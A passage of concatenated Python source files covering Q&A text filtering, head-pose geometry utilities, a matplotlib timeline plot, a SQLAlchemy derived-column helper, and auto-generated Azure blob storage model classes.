if word not in list(lower_pruning.index)])
question_body = " ".join(
[word for word in question_body.split()
if word not in list(lower_pruning.index)])
answers = [
[word for word in answer.split()
if word not in list(lower_pruning.index)]
for answer in answers
]
answers = [" ".join(txt) for txt in answers if txt]
with open(file_name, 'w') as fh:
fh.write(question_title)
fh.write("\n\n" + question_body)
for answer in answers:
fh.write("\n\n" + answer)
print("Writen " + doc["id"])
return upper_pruning, lower_pruning
# TODO DEPRECATED
# def remove_single_quotes(word):
# word = word.strip()
# if word[0] == "'" and word[-1] == "'":
# word = word[1:-1]
# return word
def remove_block_tag(tags_exp, text):
"""
Receives a text and tag pair for opening and closing
and eliminates all occurrences of the tags and its text
in between. The tags must be passed as regex.
"""
tag_open, tag_close = tags_exp[0], tags_exp[1]
while True:
start_match = re.search(tag_open, text)
end_match = re.search(tag_close, text)
if not (start_match and end_match):
break
text = text[:start_match.start()] + " " + text[end_match.end():]
return text
def remove_single_tag(tag_exp, text):
"""
Receives a tag as regex and remove all occurrences in the text.
"""
while True:
matched = re.search(tag_exp, text)
if not matched: break
text = text[:matched.start()] + " " + text[matched.end():]
return text
def filter_by_words(questions_df, answers_df, simple_words, compound_words):
""" docstring """
matched_ids = []
not_matched_ids = []
simple_word_set = set(simple_words)
punctuation_rgx = r"[^()[\]<>+\-_=\*|\^{}$&%#@!?.,:;/\"]+"
for index, row in questions_df.iterrows():
print(index)
found_flag = False
title = row.Title.lower()
in_title_compound = [
True if re.compile(compound_word).search(title) else False
for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, title)
clean_text = [word for line in clean_text for word in line.split()]
clean_text = list(map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(set(clean_text))
in_title_simple = [True] * len(simple_matched)
in_title = in_title_compound + in_title_simple
if any(in_title):
found_flag = True
else:
body = row.Body.lower()
in_body_compound = [
True if re.compile(compound_word).search(body) else False
for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, body)
clean_text = [word for line in clean_text for word in line.split()]
clean_text = list(map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(set(clean_text))
in_body_simple = [True] * len(simple_matched)
in_body = in_body_compound + in_body_simple
if any(in_body):
found_flag = True
else:
answers = answers_df.loc[answers_df.ParentId == row.Id]
for idx, line in answers.iterrows():
answer = line.Body.lower()
in_answers_compound = [
True if re.compile(compound_word).search(answer) else
False for compound_word in compound_words]
clean_text = re.findall(punctuation_rgx, answer)
clean_text = [
word for line in clean_text for word in line.split()]
clean_text = list(
map(clean.remove_quotation_marks, clean_text))
simple_matched = simple_word_set.intersection(
set(clean_text))
in_answers_simple = [True] * len(simple_matched)
in_answers = in_answers_compound + in_answers_simple
if any(in_answers):
found_flag = True
break
if found_flag:
matched_ids.append(row.Id)
else:
not_matched_ids.append(row.Id)
return matched_ids, not_matched_ids
|
py | 1a40c83b0ce0c87fbd581a10b673fbf25d24f13e | import numpy as np
from math import cos, sin, pi
import math
import cv2
from scipy.spatial import Delaunay
def softmax(x):
x -= np.max(x,axis=1, keepdims=True)
a = np.exp(x)
b = np.sum(np.exp(x), axis=1, keepdims=True)
return a/b
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 100):
# Referenced from HopeNet https://github.com/natanielruiz/deep-head-pose
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),2)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),2)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def projectPoints(X, K, R, t, Kd):
""" Projects points X (3xN) using camera intrinsics K (3x3),
extrinsics (R,t) and distortion parameters Kd=[k1,k2,p1,p2,k3].
Roughly, x = K*(R*X + t) + distortion
See http://docs.opencv.org/2.4/doc/tutorials/calib3d/camera_calibration/camera_calibration.html
or cv2.projectPoints
"""
x = np.asarray(R * X + t)
x[0:2, :] = x[0:2, :] / x[2, :]
r = x[0, :] * x[0, :] + x[1, :] * x[1, :]
x[0, :] = x[0, :] * (1 + Kd[0] * r + Kd[1] * r * r + Kd[4] * r * r * r) + 2 * Kd[2] * x[0, :] * x[1, :] + Kd[3] * (
r + 2 * x[0, :] * x[0, :])
x[1, :] = x[1, :] * (1 + Kd[0] * r + Kd[1] * r * r + Kd[4] * r * r * r) + 2 * Kd[3] * x[0, :] * x[1, :] + Kd[2] * (
r + 2 * x[1, :] * x[1, :])
x[0, :] = K[0, 0] * x[0, :] + K[0, 1] * x[1, :] + K[0, 2]
x[1, :] = K[1, 0] * x[0, :] + K[1, 1] * x[1, :] + K[1, 2]
return x
def align(model, data):
"""Align two trajectories using the method of Horn (closed-form).
https://github.com/raulmur/evaluate_ate_scale
Input:
model -- first trajectory (3xn)
data -- second trajectory (3xn)
Output:
rot -- rotation matrix (3x3)
trans -- translation vector (3x1)
trans_error -- translational error per point (1xn)
"""
np.set_printoptions(precision=3, suppress=True)
model_zerocentered = model - model.mean(1)
data_zerocentered = data - data.mean(1)
W = np.zeros((3, 3))
for column in range(model.shape[1]):
W += np.outer(model_zerocentered[:, column], data_zerocentered[:, column])
U, d, Vh = np.linalg.linalg.svd(W.transpose())
S = np.matrix(np.identity(3))
if (np.linalg.det(U) * np.linalg.det(Vh) < 0):
S[2, 2] = -1
rot = U * S * Vh
rotmodel = rot * model_zerocentered
dots = 0.0
norms = 0.0
for column in range(data_zerocentered.shape[1]):
dots += np.dot(data_zerocentered[:, column].transpose(), rotmodel[:, column])
normi = np.linalg.norm(model_zerocentered[:, column])
norms += normi * normi
s = float(dots / norms)
trans = data.mean(1) - s * rot * model.mean(1)
model_aligned = s * rot * model + trans
alignment_error = model_aligned - data
trans_error = np.sqrt(np.sum(np.multiply(alignment_error, alignment_error), 0)).A[0]
return rot, trans, trans_error, s
def rotationMatrixToEulerAngles2(R):
y1 = -math.asin(R[2,0])
y2 = math.pi - y1
if y1>math.pi:
y1 = y1 - 2*math.pi
if y2>math.pi:
y2 = y2 - 2*math.pi
x1 = math.atan2(R[2,1]/math.cos(y1), R[2,2]/math.cos(y1))
x2 = math.atan2(R[2,1]/math.cos(y2), R[2,2]/math.cos(y2))
z1 = math.atan2(R[1,0]/math.cos(y1), R[0,0]/math.cos(y1))
z2 = math.atan2(R[1, 0] / math.cos(y2), R[0, 0] / math.cos(y2))
return [x1, y1, z1], [x2, y2, z2]
def reference_head(scale=0.01,pyr=(10.,0.0,0.0)):
kps = np.asarray([[-7.308957, 0.913869, 0.000000], [-6.775290, -0.730814, -0.012799],
[-5.665918, -3.286078, 1.022951], [-5.011779, -4.876396, 1.047961],
[-4.056931, -5.947019, 1.636229], [-1.833492, -7.056977, 4.061275],
[0.000000, -7.415691, 4.070434], [1.833492, -7.056977, 4.061275],
[4.056931, -5.947019, 1.636229], [5.011779, -4.876396, 1.047961],
[5.665918, -3.286078, 1.022951],
[6.775290, -0.730814, -0.012799], [7.308957, 0.913869, 0.000000],
[5.311432, 5.485328, 3.987654], [4.461908, 6.189018, 5.594410],
[3.550622, 6.185143, 5.712299], [2.542231, 5.862829, 4.687939],
[1.789930, 5.393625, 4.413414], [2.693583, 5.018237, 5.072837],
[3.530191, 4.981603, 4.937805], [4.490323, 5.186498, 4.694397],
[-5.311432, 5.485328, 3.987654], [-4.461908, 6.189018, 5.594410],
[-3.550622, 6.185143, 5.712299], [-2.542231, 5.862829, 4.687939],
[-1.789930, 5.393625, 4.413414], [-2.693583, 5.018237, 5.072837],
[-3.530191, 4.981603, 4.937805], [-4.490323, 5.186498, 4.694397],
[1.330353, 7.122144, 6.903745], [2.533424, 7.878085, 7.451034],
[4.861131, 7.878672, 6.601275], [6.137002, 7.271266, 5.200823],
[6.825897, 6.760612, 4.402142], [-1.330353, 7.122144, 6.903745],
[-2.533424, 7.878085, 7.451034], [-4.861131, 7.878672, 6.601275],
[-6.137002, 7.271266, 5.200823], [-6.825897, 6.760612, 4.402142],
[-2.774015, -2.080775, 5.048531], [-0.509714, -1.571179, 6.566167],
[0.000000, -1.646444, 6.704956], [0.509714, -1.571179, 6.566167],
[2.774015, -2.080775, 5.048531], [0.589441, -2.958597, 6.109526],
[0.000000, -3.116408, 6.097667], [-0.589441, -2.958597, 6.109526],
[-0.981972, 4.554081, 6.301271], [-0.973987, 1.916389, 7.654050],
[-2.005628, 1.409845, 6.165652], [-1.930245, 0.424351, 5.914376],
[-0.746313, 0.348381, 6.263227], [0.000000, 0.000000, 6.763430],
[0.746313, 0.348381, 6.263227], [1.930245, 0.424351, 5.914376],
[2.005628, 1.409845, 6.165652], [0.973987, 1.916389, 7.654050],
[0.981972, 4.554081, 6.301271]]).T
R = rotate_zyx( np.deg2rad(pyr) )
kps = transform( R, kps*scale )
tris = Delaunay( kps[:2].T ).simplices.copy()
return kps, tris
def rotate_zyx(theta):
sx, sy, sz = np.sin(theta)
cx, cy, cz = np.cos(theta)
return np.array([
[cy * cz, cy * sz, -sy, 0],
[-cx * sz + cz * sx * sy, cx * cz + sx * sy * sz, cy * sx, 0],
[cx * cz * sy + sx * sz, cx * sy * sz - cz * sx, cx * cy, 0],
[0, 0, 0, 1]], dtype=float)
def transform( E, p ):
p = np.array(p)
if p.ndim > 1:
return E[:3,:3]@p + E[:3,3,None]
return E[:3,:3]@p + E[:3,3]
def get_sphere(theta, phi, row):
theta = theta / 180. * pi
phi = phi/ 180. * pi
x = row * cos(theta) * sin(phi)
y = row * sin(theta) * sin(phi)
z = row * cos(phi)
return x, y, z
def select_euler(two_sets):
pitch, yaw, roll= two_sets[0]
pitch2, yaw2, roll2 = two_sets[1]
if yaw>180.:
yaw = yaw - 360.
if yaw2>180.:
yaw2 = yaw2 - 360.
if abs(roll)<90 and abs(pitch)<90:
return True, [pitch, yaw, roll]
elif abs(roll2)<90 and abs(pitch2)<90:
return True, [pitch2, yaw2, roll2]
else:
return False, [-999, -999, -999]
def inverse_rotate_zyx(M):
if np.linalg.norm(M[:3, :3].T @ M[:3, :3] - np.eye(3)) > 1e-5:
raise ValueError('Matrix is not a rotation')
if np.abs(M[0, 2]) > 0.9999999:
# gimbal lock
z = 0.0
# M[1,0] = cz*sx*sy
# M[2,0] = cx*cz*sy
if M[0, 2] > 0:
y = -np.pi / 2
x = np.arctan2(-M[1, 0], -M[2, 0])
else:
y = np.pi / 2
x = np.arctan2(M[1, 0], M[2, 0])
return np.array((x, y, z)), np.array((x, y, z))
else:
# no gimbal lock
y0 = np.arcsin(-M[0, 2])
y1 = np.pi - y0
cy0 = np.cos(y0)
cy1 = np.cos(y1)
x0 = np.arctan2(M[1, 2] / cy0, M[2, 2] / cy0)
x1 = np.arctan2(M[1, 2] / cy1, M[2, 2] / cy1)
z0 = np.arctan2(M[0, 1] / cy0, M[0, 0] / cy0)
z1 = np.arctan2(M[0, 1] / cy1, M[0, 0] / cy1)
return np.array((x0, y0, z0)), np.array((x1, y1, z1))
|
py | 1a40c8b6db88c31c30d65d6eb8e514e909007a68 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 5 14:31:00 2016
@author: mtkessel
"""
import matplotlib.pyplot as plt
from numpy.random import random, randint
import pandas as pd
dates = [
1665,
1674,
1838,
1839,
1855]
values = [1,2,3,4,5]
X = dates #pd.to_datetime(dates)
fig, ax = plt.subplots(figsize=(6,1))
ax.scatter(X, [1]*len(X), c=values,
marker='s', s=100)
fig.autofmt_xdate()
# everything after this is turning off stuff that's plotted by default
ax.yaxis.set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.xaxis.set_ticks_position('bottom')
ax.get_yaxis().set_ticklabels([])
day = 10 #pd.to_timedelta("1", unit='D')
plt.xlim(X[0] - day, X[-1] + day)
plt.show()
|
py | 1a40c908fbae5777e7a4721651d606f37aa3bd1e | from __future__ import annotations
from typing import Any, Callable
from sqlalchemy.ext.hybrid import hybrid_property
from .expression import Expression
from .resolver import AttributeResolver, PrefetchedAttributeResolver
from .typing import ColumnDefaults
class DerivedColumn:
def __init__(
self,
expression: Expression,
default: Any = None,
prefetch_attribute_names: bool = True,
):
self.expression = expression
self.default = default
if not prefetch_attribute_names:
self.resolver = AttributeResolver(expression.columns)
else:
self.resolver = PrefetchedAttributeResolver(expression.columns)
if len(self.expression.columns) > 1 and self.default is not None:
raise TypeError("Cannot use default for multi-column expression.")
def _default_functions(self) -> ColumnDefaults:
setter = self.default
if not callable(setter):
setter = lambda: self.default # noqa
return {True: setter, False: lambda: None}
def make_getter(self) -> Callable[[Any], Any]:
"""Returns a getter function, evaluating the expression in bound scope."""
evaluate = self.expression.evaluate
values = self.resolver.values
return lambda orm_obj: evaluate(values(orm_obj))
def make_setter(self) -> Callable[[Any, Any], None]:
"""Returns a setter function setting default values based on given booleans."""
defaults = self._default_functions()
target_name = self.resolver.single_name
def _fset(self: Any, value: Any) -> None:
if not isinstance(value, bool):
raise TypeError("Flag only accepts boolean values")
setattr(self, target_name(self), defaults[value]())
return _fset
def create_hybrid(self) -> hybrid_property:
return hybrid_property(
fget=self.make_getter(),
fset=self.make_setter() if self.default is not None else None,
expr=lambda cls: self.expression.sql,
)
|
py | 1a40c97b64300cee7fcc95e8ac77a5f3c0e5cf97 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from azure.core.exceptions import HttpResponseError
class AccessPolicy(Model):
"""An Access policy.
:param start: the date-time the policy is active
:type start: str
:param expiry: the date-time the policy expires
:type expiry: str
:param permission: the permissions for the acl policy
:type permission: str
"""
_attribute_map = {
'start': {'key': 'Start', 'type': 'str', 'xml': {'name': 'Start'}},
'expiry': {'key': 'Expiry', 'type': 'str', 'xml': {'name': 'Expiry'}},
'permission': {'key': 'Permission', 'type': 'str', 'xml': {'name': 'Permission'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(AccessPolicy, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.expiry = kwargs.get('expiry', None)
self.permission = kwargs.get('permission', None)
class AppendPositionAccessConditions(Model):
"""Additional parameters for a set of operations, such as:
AppendBlob_append_block, AppendBlob_append_block_from_url, AppendBlob_seal.
:param max_size: Optional conditional header. The max length in bytes
permitted for the append blob. If the Append Block operation would cause
the blob to exceed that limit or if the blob size is already greater than
the value specified in this header, the request will fail with
MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition
Failed).
:type max_size: long
:param append_position: Optional conditional header, used only for the
Append Block operation. A number indicating the byte offset to compare.
Append Block will succeed only if the append position is equal to this
number. If it is not, the request will fail with the
AppendPositionConditionNotMet error (HTTP status code 412 - Precondition
Failed).
:type append_position: long
"""
_attribute_map = {
'max_size': {'key': '', 'type': 'long', 'xml': {'name': 'max_size'}},
'append_position': {'key': '', 'type': 'long', 'xml': {'name': 'append_position'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(AppendPositionAccessConditions, self).__init__(**kwargs)
self.max_size = kwargs.get('max_size', None)
self.append_position = kwargs.get('append_position', None)
class BlobFlatListSegment(Model):
"""BlobFlatListSegment.
All required parameters must be populated in order to send to Azure.
:param blob_items: Required.
:type blob_items: list[~azure.storage.blob.models.BlobItemInternal]
"""
_validation = {
'blob_items': {'required': True},
}
_attribute_map = {
'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'BlobItems', 'itemsName': 'Blob'}},
}
_xml_map = {
'name': 'Blobs'
}
def __init__(self, **kwargs):
super(BlobFlatListSegment, self).__init__(**kwargs)
self.blob_items = kwargs.get('blob_items', None)
class BlobHierarchyListSegment(Model):
"""BlobHierarchyListSegment.
All required parameters must be populated in order to send to Azure.
:param blob_prefixes:
:type blob_prefixes: list[~azure.storage.blob.models.BlobPrefix]
:param blob_items: Required.
:type blob_items: list[~azure.storage.blob.models.BlobItemInternal]
"""
_validation = {
'blob_items': {'required': True},
}
_attribute_map = {
'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix', 'itemsName': 'BlobPrefix'}},
'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}},
}
_xml_map = {
'name': 'Blobs'
}
def __init__(self, **kwargs):
super(BlobHierarchyListSegment, self).__init__(**kwargs)
self.blob_prefixes = kwargs.get('blob_prefixes', None)
self.blob_items = kwargs.get('blob_items', None)
class BlobHTTPHeaders(Model):
"""Additional parameters for a set of operations.
:param blob_cache_control: Optional. Sets the blob's cache control. If
specified, this property is stored with the blob and returned with a read
request.
:type blob_cache_control: str
:param blob_content_type: Optional. Sets the blob's content type. If
specified, this property is stored with the blob and returned with a read
request.
:type blob_content_type: str
:param blob_content_md5: Optional. An MD5 hash of the blob content. Note
that this hash is not validated, as the hashes for the individual blocks
were validated when each was uploaded.
:type blob_content_md5: bytearray
:param blob_content_encoding: Optional. Sets the blob's content encoding.
If specified, this property is stored with the blob and returned with a
read request.
:type blob_content_encoding: str
:param blob_content_language: Optional. Set the blob's content language.
If specified, this property is stored with the blob and returned with a
read request.
:type blob_content_language: str
:param blob_content_disposition: Optional. Sets the blob's
Content-Disposition header.
:type blob_content_disposition: str
"""
_attribute_map = {
'blob_cache_control': {'key': '', 'type': 'str', 'xml': {'name': 'blob_cache_control'}},
'blob_content_type': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_type'}},
'blob_content_md5': {'key': '', 'type': 'bytearray', 'xml': {'name': 'blob_content_md5'}},
'blob_content_encoding': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_encoding'}},
'blob_content_language': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_language'}},
'blob_content_disposition': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_disposition'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlobHTTPHeaders, self).__init__(**kwargs)
self.blob_cache_control = kwargs.get('blob_cache_control', None)
self.blob_content_type = kwargs.get('blob_content_type', None)
self.blob_content_md5 = kwargs.get('blob_content_md5', None)
self.blob_content_encoding = kwargs.get('blob_content_encoding', None)
self.blob_content_language = kwargs.get('blob_content_language', None)
self.blob_content_disposition = kwargs.get('blob_content_disposition', None)
class BlobItemInternal(Model):
"""An Azure Storage blob.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param deleted: Required.
:type deleted: bool
:param snapshot: Required.
:type snapshot: str
:param version_id:
:type version_id: str
:param is_current_version:
:type is_current_version: bool
:param properties: Required.
:type properties: ~azure.storage.blob.models.BlobPropertiesInternal
:param metadata:
:type metadata: ~azure.storage.blob.models.BlobMetadata
:param blob_tags:
:type blob_tags: ~azure.storage.blob.models.BlobTags
:param object_replication_metadata:
:type object_replication_metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
'deleted': {'required': True},
'snapshot': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'deleted': {'key': 'Deleted', 'type': 'bool', 'xml': {'name': 'Deleted'}},
'snapshot': {'key': 'Snapshot', 'type': 'str', 'xml': {'name': 'Snapshot'}},
'version_id': {'key': 'VersionId', 'type': 'str', 'xml': {'name': 'VersionId'}},
'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool', 'xml': {'name': 'IsCurrentVersion'}},
'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal', 'xml': {'name': 'Properties'}},
'metadata': {'key': 'Metadata', 'type': 'BlobMetadata', 'xml': {'name': 'Metadata'}},
'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags', 'xml': {'name': 'BlobTags'}},
'object_replication_metadata': {'key': 'ObjectReplicationMetadata', 'type': '{str}', 'xml': {'name': 'ObjectReplicationMetadata'}},
}
_xml_map = {
'name': 'Blob'
}
def __init__(self, **kwargs):
super(BlobItemInternal, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.deleted = kwargs.get('deleted', None)
self.snapshot = kwargs.get('snapshot', None)
self.version_id = kwargs.get('version_id', None)
self.is_current_version = kwargs.get('is_current_version', None)
self.properties = kwargs.get('properties', None)
self.metadata = kwargs.get('metadata', None)
self.blob_tags = kwargs.get('blob_tags', None)
self.object_replication_metadata = kwargs.get('object_replication_metadata', None)
class BlobMetadata(Model):
"""BlobMetadata.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, str]
:param encrypted:
:type encrypted: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{str}', 'xml': {'name': 'additional_properties'}},
'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'name': 'Encrypted', 'attr': True}},
}
_xml_map = {
'name': 'Metadata'
}
def __init__(self, **kwargs):
super(BlobMetadata, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.encrypted = kwargs.get('encrypted', None)
class BlobPrefix(Model):
"""BlobPrefix.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlobPrefix, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
class BlobPropertiesInternal(Model):
"""Properties of a blob.
All required parameters must be populated in order to send to Azure.
:param creation_time:
:type creation_time: datetime
:param last_modified: Required.
:type last_modified: datetime
:param etag: Required.
:type etag: str
:param content_length: Size in bytes
:type content_length: long
:param content_type:
:type content_type: str
:param content_encoding:
:type content_encoding: str
:param content_language:
:type content_language: str
:param content_md5:
:type content_md5: bytearray
:param content_disposition:
:type content_disposition: str
:param cache_control:
:type cache_control: str
:param blob_sequence_number:
:type blob_sequence_number: long
:param blob_type: Possible values include: 'BlockBlob', 'PageBlob',
'AppendBlob'
:type blob_type: str or ~azure.storage.blob.models.BlobType
:param lease_status: Possible values include: 'locked', 'unlocked'
:type lease_status: str or ~azure.storage.blob.models.LeaseStatusType
:param lease_state: Possible values include: 'available', 'leased',
'expired', 'breaking', 'broken'
:type lease_state: str or ~azure.storage.blob.models.LeaseStateType
:param lease_duration: Possible values include: 'infinite', 'fixed'
:type lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
:param copy_id:
:type copy_id: str
:param copy_status: Possible values include: 'pending', 'success',
'aborted', 'failed'
:type copy_status: str or ~azure.storage.blob.models.CopyStatusType
:param copy_source:
:type copy_source: str
:param copy_progress:
:type copy_progress: str
:param copy_completion_time:
:type copy_completion_time: datetime
:param copy_status_description:
:type copy_status_description: str
:param server_encrypted:
:type server_encrypted: bool
:param incremental_copy:
:type incremental_copy: bool
:param destination_snapshot:
:type destination_snapshot: str
:param deleted_time:
:type deleted_time: datetime
:param remaining_retention_days:
:type remaining_retention_days: int
:param access_tier: Possible values include: 'P4', 'P6', 'P10', 'P15',
'P20', 'P30', 'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type access_tier: str or ~azure.storage.blob.models.AccessTier
:param access_tier_inferred:
:type access_tier_inferred: bool
:param archive_status: Possible values include:
'rehydrate-pending-to-hot', 'rehydrate-pending-to-cool'
:type archive_status: str or ~azure.storage.blob.models.ArchiveStatus
:param customer_provided_key_sha256:
:type customer_provided_key_sha256: str
:param encryption_scope: The name of the encryption scope under which the
blob is encrypted.
:type encryption_scope: str
:param access_tier_change_time:
:type access_tier_change_time: datetime
:param tag_count:
:type tag_count: int
:param expires_on:
:type expires_on: datetime
:param is_sealed:
:type is_sealed: bool
:param rehydrate_priority: Possible values include: 'High', 'Standard'
:type rehydrate_priority: str or
~azure.storage.blob.models.RehydratePriority
"""
_validation = {
'last_modified': {'required': True},
'etag': {'required': True},
}
_attribute_map = {
'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123', 'xml': {'name': 'Creation-Time'}},
'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123', 'xml': {'name': 'Last-Modified'}},
'etag': {'key': 'Etag', 'type': 'str', 'xml': {'name': 'Etag'}},
'content_length': {'key': 'Content-Length', 'type': 'long', 'xml': {'name': 'Content-Length'}},
'content_type': {'key': 'Content-Type', 'type': 'str', 'xml': {'name': 'Content-Type'}},
'content_encoding': {'key': 'Content-Encoding', 'type': 'str', 'xml': {'name': 'Content-Encoding'}},
'content_language': {'key': 'Content-Language', 'type': 'str', 'xml': {'name': 'Content-Language'}},
'content_md5': {'key': 'Content-MD5', 'type': 'bytearray', 'xml': {'name': 'Content-MD5'}},
'content_disposition': {'key': 'Content-Disposition', 'type': 'str', 'xml': {'name': 'Content-Disposition'}},
'cache_control': {'key': 'Cache-Control', 'type': 'str', 'xml': {'name': 'Cache-Control'}},
'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long', 'xml': {'name': 'x-ms-blob-sequence-number'}},
'blob_type': {'key': 'BlobType', 'type': 'BlobType', 'xml': {'name': 'BlobType'}},
'lease_status': {'key': 'LeaseStatus', 'type': 'LeaseStatusType', 'xml': {'name': 'LeaseStatus'}},
'lease_state': {'key': 'LeaseState', 'type': 'LeaseStateType', 'xml': {'name': 'LeaseState'}},
'lease_duration': {'key': 'LeaseDuration', 'type': 'LeaseDurationType', 'xml': {'name': 'LeaseDuration'}},
'copy_id': {'key': 'CopyId', 'type': 'str', 'xml': {'name': 'CopyId'}},
'copy_status': {'key': 'CopyStatus', 'type': 'CopyStatusType', 'xml': {'name': 'CopyStatus'}},
'copy_source': {'key': 'CopySource', 'type': 'str', 'xml': {'name': 'CopySource'}},
'copy_progress': {'key': 'CopyProgress', 'type': 'str', 'xml': {'name': 'CopyProgress'}},
'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123', 'xml': {'name': 'CopyCompletionTime'}},
'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str', 'xml': {'name': 'CopyStatusDescription'}},
'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool', 'xml': {'name': 'ServerEncrypted'}},
'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool', 'xml': {'name': 'IncrementalCopy'}},
'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str', 'xml': {'name': 'DestinationSnapshot'}},
'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123', 'xml': {'name': 'DeletedTime'}},
'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int', 'xml': {'name': 'RemainingRetentionDays'}},
'access_tier': {'key': 'AccessTier', 'type': 'str', 'xml': {'name': 'AccessTier'}},
'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool', 'xml': {'name': 'AccessTierInferred'}},
'archive_status': {'key': 'ArchiveStatus', 'type': 'str', 'xml': {'name': 'ArchiveStatus'}},
'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str', 'xml': {'name': 'CustomerProvidedKeySha256'}},
'encryption_scope': {'key': 'EncryptionScope', 'type': 'str', 'xml': {'name': 'EncryptionScope'}},
'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123', 'xml': {'name': 'AccessTierChangeTime'}},
'tag_count': {'key': 'TagCount', 'type': 'int', 'xml': {'name': 'TagCount'}},
'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123', 'xml': {'name': 'Expiry-Time'}},
'is_sealed': {'key': 'Sealed', 'type': 'bool', 'xml': {'name': 'Sealed'}},
'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str', 'xml': {'name': 'RehydratePriority'}},
}
_xml_map = {
'name': 'Properties'
}
def __init__(self, **kwargs):
super(BlobPropertiesInternal, self).__init__(**kwargs)
self.creation_time = kwargs.get('creation_time', None)
self.last_modified = kwargs.get('last_modified', None)
self.etag = kwargs.get('etag', None)
self.content_length = kwargs.get('content_length', None)
self.content_type = kwargs.get('content_type', None)
self.content_encoding = kwargs.get('content_encoding', None)
self.content_language = kwargs.get('content_language', None)
self.content_md5 = kwargs.get('content_md5', None)
self.content_disposition = kwargs.get('content_disposition', None)
self.cache_control = kwargs.get('cache_control', None)
self.blob_sequence_number = kwargs.get('blob_sequence_number', None)
self.blob_type = kwargs.get('blob_type', None)
self.lease_status = kwargs.get('lease_status', None)
self.lease_state = kwargs.get('lease_state', None)
self.lease_duration = kwargs.get('lease_duration', None)
self.copy_id = kwargs.get('copy_id', None)
self.copy_status = kwargs.get('copy_status', None)
self.copy_source = kwargs.get('copy_source', None)
self.copy_progress = kwargs.get('copy_progress', None)
self.copy_completion_time = kwargs.get('copy_completion_time', None)
self.copy_status_description = kwargs.get('copy_status_description', None)
self.server_encrypted = kwargs.get('server_encrypted', None)
self.incremental_copy = kwargs.get('incremental_copy', None)
self.destination_snapshot = kwargs.get('destination_snapshot', None)
self.deleted_time = kwargs.get('deleted_time', None)
